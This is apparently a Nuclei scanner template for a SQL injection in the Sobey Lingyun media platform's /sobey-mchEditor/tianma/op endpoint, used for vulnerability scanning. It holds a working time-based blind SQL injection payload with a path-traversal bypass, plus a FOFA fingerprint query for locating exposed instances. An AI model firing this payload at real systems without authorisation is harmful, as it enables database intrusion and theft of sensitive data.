id: sobeylingyun-sobey-mchEditor-sqli
info:
  name: 索贝凌云融合媒体平台 /sobey-mchEditor/tianma/op SQL注入漏洞
  author: leadlife
  severity: high
  description: 索贝产品中的 /sobey-mchEditor/tianma/op 接口存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，获取数据库中的敏感信息，甚至可能导致数据库被完全控制。
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/vawpww7yviel4lcm
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: body="styles/sobey-fonts/style.css" || icon_hash="689611853"
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,sobeylingyun

http:
  - raw:  
      - |
        @timeout: 15s
        POST /sobey-mchEditor/js/%2e%2e/tianma/op HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 87

        opstatus=up&siteCode=1&token=1&ids=1') OR (SELECT 1337 FROM (SELECT(SLEEP(5)))test)-- -

    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - duration >= 5 && duration < 9
        condition: and